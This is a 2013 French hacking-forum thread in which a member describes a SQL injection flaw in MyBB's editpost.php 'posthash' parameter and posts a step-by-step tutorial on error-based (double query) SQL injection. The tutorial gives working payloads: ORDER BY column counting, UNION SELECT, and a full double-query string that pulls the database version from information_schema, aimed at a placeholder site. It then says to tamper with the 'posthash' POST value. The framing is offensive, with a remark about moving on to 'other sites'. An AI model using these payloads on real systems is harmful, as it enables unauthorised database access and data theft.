• STATISTIQUES
  • Il y a eu un total de 0 membres et 5387 visiteurs sur le site dans les dernières 24h pour un total de 5 387 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Sabre Films
    Site de challenge présenté sous la forme d'une quête. Vous êtes un détective et devrez résoudre d...
    Challenges
    [EN] Big-Daddy
    Big-Daddy est site internet communautaire avec un effectif diversifié, y compris des artistes, des programmeur...
    Hacking
    [EN] Hack this site
    Basic: 11, Realistic: 17, Application: 18, Programming: 12, Extbasic: 14, Javascript: 7, Stego: 17
    Challenges
    [FR] InfoMirmo
    Apprentissage de l'informatique par l'intermédiaire de challenges de sécurité. Venez app...
    Hacking
    [EN] HackQuest
    Logic: 12, JavaScript: 14, Applet: 6, CrackIt: 13, Crypto: 11, Internet: 3, Exploit: 7, Stegano: 12, Flash: 1, Programmi...
    Challenges
    [EN] Lost-chall
    Site de challenge présenté sous la forme de différente saison. Pour passer une saison vous devez avoir accumulÃ...
    Challenges
    [FR] Kalkulators
    Ce projet a plusieurs buts, le premier étant l’étude de toutes formes cryptographiques, le cot&ea...
    Cryptographie

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!

    €



Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Mybb editpost.php
23-08-2013, 10h15 (Modification du message : 23-08-2013, 13h51 par Yuri.)
Message : #1
Yuri Hors ligne
Czech Membre
*



Messages : 53
Sujets : 7
Points: 4
Inscription : Aug 2013
Mybb editpost.php
Vulnerable code:


MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection.

[spoiler]Error based sql injection tutorial - Double query injection

Vous aurez besoin d'une cible comme celle-ci

Citation :www.site.com/thegame.php?i=36

Ensuite comme pour l'injection basic, insérez caractère spécial ici le ( ' ).

Citation :www.site.com/thegame.php?i=36'

Nous avons donc la fameuse syntax error SQL. Angel

[Image: erroryu.png]

Maintenant Yuri vous dit d'injecter ceci :p Vous dites Ok on va injecter !
( ironie Dodgy )

Citation :www.site.com/thegame.php?i=36 order by 10-- aucune erreur
www.site.com/thegame.php?i=36 order by 20-- aucune erreur
www.site.com/thegame.php?i=36 order by 50-- aucune erreur
www.site.com/thegame.php?i=36order by 100-- aucune erreur

Dah fuck ? Angry

Essayons ça alors :o

Citation :www.site.com/thegame.php?i=36' order by 100--+

Ah enfin :p Maintenant, nous avons une erreur dans les colonnes.

[Image: unknownd.png]

Maintenant, go obtenir les colonnes :

Citation :www.site.com/thegame.php?i=36' order by 10--+ erreur

www.site.com/thegame.php?i=36' order by 8--+ erreur
www.site.com/thegame.php?i=36' order by 6--+ erreur
www.site.com/thegame.php?i=36' order by 5--+ Aucune erreur

Ok trouver nombre de colonnes [ FAIT ] prochaine étape à l'aide de la commande d'union nous allons trouver la colonne VULN !! Angel

Citation :www.site.com/thegame.php?i=36' union select 1,2,3,4,5--+

Et BOOM ça faits des chocapics !

[Image: unionr.png]

Alors, pouvons-nous utiliser une autre méthode comme celle en aveugle Voyons cela Huh ?

Citation :www.site.com/thegame.php?i=36' and 1=1--+ c'est vrai donc aucune erreur

Citation :www.site.com/thegame.php?i=36' and 1=2--+
c'est faux et aucune erreur humm

Est-ce que nous devrions abandonner et de trouver d'autres sites?
Non, essayons autre méthode appelée ERROR BASED INJECTION(DOUBLE QUERY)

Dans cette méthode, nous utilisons la syntaxe spécifique pour obtenir des données de base de données

Le code que nous utilisons pour obtenir la version, base de données et aslo utilisateur -> Angel

Code :
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DAH FUCK c'est quoi ça O_O Dodgy

Ecoute essaye ça sur notre site :p

Citation :http://www.site.com/thegame.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

[Image: 81406053.png]
AngelAngel

Nous n'avons pas utilisé hex
Code :
0x7e,0x27
Nous pouvons utiliser la syntaxe sans eux et notre code comme ceci :

Citation :http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

Il fonctionne bien, mais il ya un autre problème que vous devez savoir on efface la valeur hexadécimale du résultat de code de celui-ci comme :

[Image: 24262231.png]

Comme vous le voyez, nous avons foregner "1" près de nom de version et il restera pour tous nos résultats ainsi il peut se confondre quelqu'un qui démarre nouveau ce type d'injection.
Dans ce tutoriel, je vous écris tout syntaxe avec valeur hexadécimale
[/spoiler]

Ici c'est le même principe sauf que nous sommes dans un l'altérage de donnés le trucage de donnée OoO

/editpost.php

Code :
===
Line 398
===
$posthash_query = "posthash='{$posthash}' OR ";
===

Utiliser Tamper Data (ou en-têtes HTTP en direct), lors de la partie soumettre un message, modifiez le paramètre POST 'posthash' à votre charge,
altéré, puis éditer votre message.
[align=center]
[Image: 2HFxC.png]
[Image: QVUdXh.png]
[Image: abBpE.png]

L'exploit est exécutable sous une console ruby ou perl sans payload comme démontre sous metasploit ça a marché sous résever d'un exploit.
+1 (0) -1 (0) Répondre
23-08-2013, 12h45
Message : #2
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: Mybb editpost.php
ça concerne quelles versions de MyBB ?
tu peux donner des détails techniques sur comment fontionne la faille ?
pourquoi/comment dans le code source par exemple ?
+1 (0) -1 (0) Répondre
23-08-2013, 13h49
Message : #3
Yuri Hors ligne
Czech Membre
*



Messages : 53
Sujets : 7
Points: 4
Inscription : Aug 2013
RE: Mybb editpost.php
Edit, tutoriel sur l'error based Smile
Citation :" Pour apprendre à boxer il suffit d'une nuit. Il faut une vie entière pour apprendre à combattre. "
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  MyBB 1.6.10 Bypass CSRF Protection 0pc0deFR 9 598 27-08-2013, 13h11
Dernier message: kallimero
  FPD sur MyBB 1.6.8 et supérieur InstinctHack 3 311 22-08-2013, 23h13
Dernier message: Di0Sasm
  shoutbox mybb InFamouZz 8 588 14-01-2013, 23h22
Dernier message: InFamouZz

Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut